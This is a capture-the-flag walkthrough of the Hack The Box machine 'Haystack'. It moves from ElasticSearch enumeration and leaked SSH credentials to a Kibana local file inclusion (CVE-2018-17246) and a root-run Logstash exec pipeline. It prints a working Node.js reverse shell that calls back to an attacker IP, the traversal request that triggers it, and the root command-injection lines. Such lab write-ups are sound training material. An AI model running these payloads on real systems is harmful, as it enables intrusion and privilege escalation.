Hack The Box: Haystack

We start by running nmap, with the following options:

root@flagship:~# nmap -p- -T4 -oN notes -A 10.10.10.115

I always run it with -p-, which will scan all 65535 TCP ports rather than just the 1000 most common ones. And in this case, we see a few open ports:

PORT     STATE SERVICE REASON         VERSION                                                                                                                                                                      
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    syn-ack ttl 63 nginx 1.12.2
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (text/html).
9200/tcp open  http    syn-ack ttl 63 nginx 1.12.2
|_http-favicon: Unknown favicon MD5: 6177BFB75B498E0BB356223ED76FFE43
| http-methods:
|   Supported Methods: HEAD GET DELETE OPTIONS
|_  Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (application/json; charset=UTF-8).

On port 80, it’s just a page with an image.

But since this is HTB, it’s worth having a quick look for any steganography. strings doesn’t reveal anything, but xxd does, at the very end of the file:

0002ca80: 8a00 28a2 8a00 28a2 8a00 28a2 8a00 28a2  ..(...(...(...(.
0002ca90: 8a00 28a2 8a00 ffd9 0a62 4745 6759 5764  ..(......bGEgYWd
0002caa0: 3161 6d45 675a 5734 675a 5777 6763 4746  1amEgZW4gZWwgcGF
0002cab0: 7159 5849 675a 584d 6749 6d4e 7359 585a  qYXIgZXMgImNsYXZ
0002cac0: 6c49 673d 3d0a                           lIg==.

That looks like base64, so let us decode that:

root@flagship:~# echo bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg== | base64 -d
la aguja en el pajar es "clave"

That's Spanish for "the needle in the haystack is 'clave'", clave itself being Spanish for key.

Since there doesn’t appear to be anything else to do with the image, let’s have a look at port 9200. If we access it, we get the following:

root@orbital:~# curl http://10.10.10.115:9200/
{
  "name" : "iQEYHgS",
  "cluster_name" : "elasticsearch",
  "cluster_uuid" : "pjrX7V_gSFmJY-DxP4tCQg",
  "version" : {
    "number" : "6.4.2",
    "build_flavor" : "default",
    "build_type" : "rpm",
    "build_hash" : "04711c2",
    "build_date" : "2018-09-26T13:34:09.098244Z",
    "build_snapshot" : false,
    "lucene_version" : "7.4.0",
    "minimum_wire_compatibility_version" : "5.6.0",
    "minimum_index_compatibility_version" : "5.0.0"
  },
  "tagline" : "You Know, for Search"
}

So we’re dealing with an ElasticSearch instance, version 6.4.2. If you aren’t familiar with it, this is a good starting point: ElasticSearch 101. However, the relevant part here is that URLs are expected to be in the format of http://10.10.10.115:9200/<index>/<type>/<id>, so we can try to find which indices are available with gobuster:

root@orbital:~# gobuster dir -u http://10.10.10.115:9200/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.115:9200/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/09/07 21:21:02 Starting gobuster
===============================================================
/quotes (Status: 200)
/bank (Status: 200)
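Incidentally, brute forcing isn't strictly necessary for this step: ElasticSearch exposes a _cat API that lists the indices directly. A quick sketch (output omitted):

root@orbital:~# curl "http://10.10.10.115:9200/_cat/indices?v"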

Knowing that the indices quotes and bank exist, we then need to find the types they contain. Gobuster won’t cut it for this, as we want to request http://10.10.10.115:9200/quotes/<type>/1 and http://10.10.10.115:9200/bank/<type>/1, so we turn to wfuzz:

root@orbital:~# wfuzz -u http://10.10.10.115:9200/quotes/FUZZ/1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.115:9200/quotes/FUZZ/1
Total requests: 220560

==================================================================
ID   Response   Lines      Word         Chars          Payload
==================================================================
000826:  C=200      0 L       63 W          462 Ch        "quote"

And then we repeat the same for bank:

root@orbital:~# wfuzz -u http://10.10.10.115:9200/bank/FUZZ/1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.115:9200/bank/FUZZ/1
Total requests: 220560

==================================================================
ID   Response   Lines      Word         Chars          Payload
==================================================================

000349:  C=200      0 L        3 W          286 Ch        "account"
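As with the indices, the type names could also have been pulled straight from ElasticSearch's mapping API rather than fuzzed; for example (output omitted):

root@orbital:~# curl "http://10.10.10.115:9200/quotes/_mapping"
root@orbital:~# curl "http://10.10.10.115:9200/bank/_mapping"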

Now that we know both types, we just have to identify which ids are valid. Again, wfuzz can do this by using a range iterator:

root@orbital:~# wfuzz -u http://10.10.10.115:9200/bank/account/FUZZ -z range,1-2000 --hc 404
root@orbital:~# wfuzz -u http://10.10.10.115:9200/quotes/quote/FUZZ -z range,1-2000 --hc 404

This will show us that there are 999 valid ids – which we can then download using our trusty curl for further analysis.

root@flagship:~# curl "http://10.10.10.115:9200/bank/accounts/[1-999]" -o "accounts/#1"
root@flagship:~# curl "http://10.10.10.115:9200/quotes/quote/[1-999]" -o "quotes/#1"

Blindly grepping the nearly 2000 files for credentials didn’t turn up anything useful, but searching for the hint from the image does:

root@flagship:~# grep -r clave *
quotes/45.html:{"_index":"quotes","_type":"quote","_id":"45","_version":1,"found":true,"_source":{"quote":"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "}}
quotes/111.html:{"_index":"quotes","_type":"quote","_id":"111","_version":1,"found":true,"_source":{"quote":"Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}}

With some more base64-looking strings, we decode them as before:

root@flagship:~# echo dXNlcjogc2VjdXJpdHkg | base64 -d
user: security 
root@flagship:~# echo cGFzczogc3BhbmlzaC5pcy5rZXk= | base64 -d
pass: spanish.is.key

With these credentials, we can log in via SSH and grab the user flag.

root@flagship:~# ssh security@10.10.10.115
security@10.10.10.115's password: 
[security@haystack ~]$ ls
user.txt

Now that we have a foothold, the next step is to run Linux Smart Enumeration and see if that gives us anything interesting to go on. Thankfully, since we already have SSH access, we can just copy it over with scp rather than anything more elaborate.
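For reference, the copy is a one-liner; this assumes the script was saved locally as lse.sh (adjust the name to whatever you downloaded):

root@flagship:~# scp lse.sh security@10.10.10.115:/tmp/
[security@haystack ~]$ bash /tmp/lse.sh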

From a cursory look at the results from LSE, we can see this server is running an ELK stack (ElasticSearch, Logstash, Kibana), with matching user accounts. Additionally, Logstash is running as root and is a likely escalation point.
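You can confirm the root-owned Logstash process directly from the process list, without relying on the LSE output:

[security@haystack ~]$ ps -ef | grep -E 'logstash|kibana|elasticsearch' | grep -v grep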

It also looks like the following ports can be accessed internally: 5601 (Kibana), plus 9200 and 9300 (both ElasticSearch). 5601 is particularly interesting, as it wasn’t reachable remotely.
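The listening ports are easy to verify with ss (or netstat, where available):

[security@haystack ~]$ ss -tln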

We already know the stack is running version 6.4.2, and Kibana normally matches the ElasticSearch version, so it’s worth checking for known issues we can leverage. Looking for vulnerabilities, the very first one seems relevant: CVE-2018-17246, an arbitrary file inclusion flaw in Kibana’s Console plugin (detailed explanation here).
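CVE-2018-17246 affects Kibana versions before 6.4.3, so it's worth confirming the Kibana version from the box itself; its status API should report it (a quick check, output omitted):

[security@haystack ~]$ curl -s 127.0.0.1:5601/api/status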

It looks like we might get an LFI using this, which would then let us execute code as the kibana user. We can get a viable Node.js reverse shell from here:

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    // Point this at your own attacking machine and listener port
    client.connect(1337, "10.10.16.40", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

We copy this to haystack (in my case, as /tmp/hn1.js) and call the vulnerable endpoint:

[security@haystack tmp]$ curl 127.0.0.1:5601/api/console/api_server?apis=../../../../../../../../../../tmp/hn1.js  

And on our attacking machine, where we had a netcat listener waiting, we get a callback:

root@flagship:~/shared.node/htb# nc -lvp 1337
listening on [any] 1337 ...
10.10.10.115: inverse host lookup failed: Unknown host
connect to [10.10.16.40] from (UNKNOWN) [10.10.10.115] 52436
whoami
kibana

And then we upgrade our shell into something a bit more usable:

python -c 'import pty; pty.spawn("/bin/bash")'  
bash-4.2$
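If you want a fully interactive TTY on top of that (tab completion, Ctrl-C that doesn't kill the connection), the usual follow-up is to background the shell with Ctrl-Z, fix the local terminal, and foreground it again:

bash-4.2$ ^Z
root@flagship:~/shared.node/htb# stty raw -echo; fg
bash-4.2$ export TERM=xterm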

We know that logstash runs as root, so that is probably our way in. In a simple ELK stack, Logstash ingests and processes data, ships it to ElasticSearch, and Kibana then presents it; the Logstash pipeline configuration lives in /etc/logstash/conf.d. That folder is only accessible now that we are running as the kibana user, and although the files can be read, they can’t be modified.

input.conf

input {
         file {
                 path => "/opt/kibana/logstash_*"
                 start_position => "beginning"
                 sincedb_path => "/dev/null"
                 stat_interval => "10 second"
                 type => "execute"
                 mode => "read"
         }
 }

filter.conf

filter {
        if [type] == "execute" {
                grok {
                        match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
                }
        }
}

output.conf

output {
        if [type] == "execute" {
                stdout { codec => json }
                exec {
                        command => "%{comando} &"
                }
        }
}

From reading these files, we can see that Logstash watches the folder /opt/kibana/ for files whose names start with logstash_, polling every 10 seconds. Any line matching Ejecutar comando : followed by a command has that command captured by the grok filter and passed to the exec output plugin, and since Logstash runs as root, whatever we put there gets executed as root.

Since we know what we want to get out is the root flag, we can do the following:

bash-4.2$ echo 'Ejecutar comando : cp /root/root.txt /tmp/root.txt' > /opt/kibana/logstash_root
bash-4.2$ echo 'Ejecutar comando : chmod 777 /tmp/root.txt' > /opt/kibana/logstash_root2

And within ten seconds our commands will get executed:

bash-4.2$ wc -c /tmp/root.txt
33 /tmp/root.txt